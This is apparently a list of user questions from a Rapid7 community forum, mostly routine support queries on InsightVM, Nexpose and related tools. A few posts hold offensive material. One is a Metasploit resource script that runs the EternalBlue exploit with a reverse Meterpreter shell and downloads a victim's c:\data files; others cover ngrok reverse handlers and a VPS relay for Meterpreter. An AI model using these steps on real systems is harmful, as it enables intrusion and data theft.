With InsightVM, I could easily integrate with ServiceNow within Remediation Project. However, there are a lot of things to configure, such as "Ticketing Project and Field Mapping". I read through below link, but there is not enough information. https://insightvm.help.rapid7.com/v1.0/docs/ticketing-integration-for-remediation-workflow-projects Is anyone could help me what should I input each blank setting or any other document other than above link? Regards
Posted by Takayuki Murai about a year ago
hello, i was playing around with ngrok and metasploit and my virtual machines i have a problem with the reverse tcp exploit it doesn't gives the meterpreter payload.. [-] Handler failed to bind to ip of ngrok ip :4444:- [*] Started reverse TCP handler on 0.0.0.0:4444 [-] Exploit aborted due to failure: unknown: remote ip :8080 - Error retrieving table prefix [*] Exploit completed, but no session was created. it worth ngrok for this purpose ? what should i do ? thank you
Posted by noah botello about a year ago
Hi Support, I have installed Nexpose console in my AWS VPC environment. I am able to ssh into the instance where installs Nexpose console. The service "nexposeconsole" is running. I am trying to connect to the web interface via 443, but connection was refused. We only one port 80/443 open in this VPC environment. I have changed server port to "443" in /opt/rapid7/nexpose/nsc/conf/httpd.xml, and restarted service "nexposeconsole". But still doesn't work. Is it possible to use 443 as server port for nexposeconsole? Thanks!
Posted by Chunyong Lin about a year ago
Is there a way to setup a connection to a private Docker Registry in InsightVM without a username and password? Our private registry does not use username/password for internal hosts and the documentation does not say that they are required for connections to private registries (https://insightvm.help.rapid7.com/v1.0/docs/working-with-containers just says "To create your registry connection, you'll need to enter a name, host, and port. Private Docker registries should concatenate the port to the end of the given URI before saving (e.g. google.com:80).") Is the real problem here that the connection is happening straight from the cloud based InsightVM and not the internal Nexpose Console? It doesn't make a lot of sense to ask customers to open up their private registries to external connections when there is already a console running internally that could be used to funnel that connection to InsightVM.
Posted by Joshua Hill about a year ago
Hi! Could you please help me with the issue of web authentication. I am trying to create it using HTML form, but when I test the form - I am recivieing the following error: Authentication failed. Use valid credentials. I observe this trouble with the specific portal. How can I DEBUG this? I could not find any logs related with the creation of web authentication. Thank you!
Posted by Sergey about a year ago
Hello, I am looking for some help for generating a SQL query to report on remediated vulnerabilities. Management is asking for the past 6 months worth of data, but I've only been able to find examples for the past 30 days. My SQL knowledge is minimal, so any help would be greatly appreciated. Thank you!
Posted by Zach Garrow about a year ago
Hi all! I have a question to ask. I want to write a script to exploit a server 2008 with ms17-010. I use msfconsole -r ms17.rc. And ms17.rc have content is use exploit/windows/smb/ms17-010-eternablue set rhost ip_victim set payload windows/x64/meterpreter/reverse_tcp set lhost ip_my exploit download c:\data\* /root/Desktop/ But it just run to exploit. And can't excute command download c:\data\* /root/Desktop/. So my question is. How do i do can excute command download c:\data\* /root/Desktop/ with automate. Because i want to build a machine to teach my sudent. Excuse my bad English!
Posted by Nguyen Hung about a year ago
Dear all, I have a problem with nexpose scan. There was an error which generated on application: Failed (java.io.IOException: The Nmap exit value is not zero: -1073741819 at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source) at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source) at com.rapid7.nexpose.scan.Scan.start(Unknown Source) at com.rapid7.nexpose.scan.Scan.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) ) when I tried to use nmap in application directory (C:\Program Files\rapid7\nexpose\nse\nmap), there was an error "Nmap has stopped working". So what is the main cause of this problem?? Rgds, Zaini
Posted by Zaini Maulana about a year ago
When adding a file location for a DNS event source it gives me an error: DNS File does not exist - /opt/rapid7/collector/\\164.... (my DNS Sever and file location). Where is the /opt/rapid7/collector being inserted? Better question is why?
Posted by Russ Verbofsky about a year ago
I am running InsightIDR on an Ubuntu server and getting this error on the collector in InsightIDR: "The hostname has not been set to a fully qualified domain name for this collector. Endpoints will not be able to use this collector to communicate." The server host name is a FQDN. Where is the issue and how to correct it?
Posted by Russ Verbofsky about a year ago
Hi, I'm scanning a french OS with template CIS. Administrators is Administrateurs in french. So because of that I have some false checks with CIS. So I would like to modify some checks. I did a copy and after that I opened the files in the directory \\...\custom-policy\... It's not easy to change the files. How can I do ?
Posted by gerard about a year ago
Currently Cross-Site Request Forgery (CSRF) is set to Low in AppSpider. We want to change this in to a Medium for all our scans. When I go into Advanced Options -> AttackPolicyConfig -> AttackPolicyModuleList -> CrossSite Request Forgery (CSRF) -> Severity to Medium. I saved and reran. But the scan is still showing these vulnerabilities as Low. Any ideas?
Posted by chris birely about a year ago
I'm using the query below and filtering based on asset group (ex: servers, clients, or net gear) and need to add a column that shows total assets for each site. Is that possible, if so how? SELECT ds.name, dsc.finished AS last_scanned, dss.description, fs.vulnerabilities, fs.critical_vulnerabilities, fs.moderate_vulnerabilities, fs.malware_kits, fs.exploits, fs.riskscore FROM fact_site fs JOIN dim_site ds USING (site_id) JOIN dim_scan dsc ON ds.last_scan_id = dsc.scan_id JOIN dim_scan_status dss USING (status_id) ORDER BY ds.name ASC
Posted by Doug Schaible about a year ago
We have over a thousand printers and, when scanned on port 9100, many of them print out 10 pages of garbage. How do other people handle this? I'm being asked by the help desk and the networking team to just "not scan port 9100 or exclude all printers from scans" but that is a terrible solution that increases our risk level. At the same time, wasting 5,000 sheets of paper a day and wasting people's time is a terrible solution.
Posted by Jasey DePriest about a year ago
I just want to check the status of questions I've already asked, but I have to ask a new question to be able to log in. Why isn't there a profile or account page for users? Why don't have I have a dashboard that can easily show me questions I've asked, tried to answer, or just "liked"?
Posted by Jasey DePriest about a year ago
Hello, Can someone please give me a hand updating the SQL query below to include the last scan date associated with each asset in the SQL query below? WITH assets_scanned_today AS ( SELECT DISTINCT(asset_id) FROM dim_asset_scan WHERE scan_finished > (NOW() - INTERVAL '27 hours') ) SELECT dt.tag_name AS tag_name, da.asset_id, da.ip_address, sites AS name, COALESCE(da.host_name, 'R7-DEV-ID-' || da.asset_id) devicename, da.mac_address, dos.description AS operating_system FROM dim_asset da JOIN dim_tag_asset USING (asset_id) JOIN dim_scope_tag USING (tag_id) JOIN dim_tag dt USING (tag_id) JOIN dim_operating_system dos USING (operating_system_id) JOIN dim_site_asset sa USING (asset_id) WHERE asset_id IN (SELECT asset_id FROM assets_scanned_today) ORDER BY dt.tag_name, da.ip_address
Posted by Chad Viola about a year ago
I am fairly new to Metasploit (and subsequently Meterpreter) so please bear that in mind in your response.. I have a root access to a VPS with at dedicated IP address. In this scenario, the target machine is running Windows and is inside a remote network. Setting aside the logistics of firewalls and AV software, is there a way to use my VPS as a static point of connection (listener?) for Meterpreter? Or is it possible to use my VPS as just a passthrough for Meterpreter, where the intending end point is the attackers private network? I took a look at an article that talks about using portfwd in Meterpreter but it appears as though I would have to have Meterpreter installed on my VPS in order to use portfwd...? Any and all knowledge/advice/criticism/expertise and welcomed and thanked. Tony
Posted by Tony W about a year ago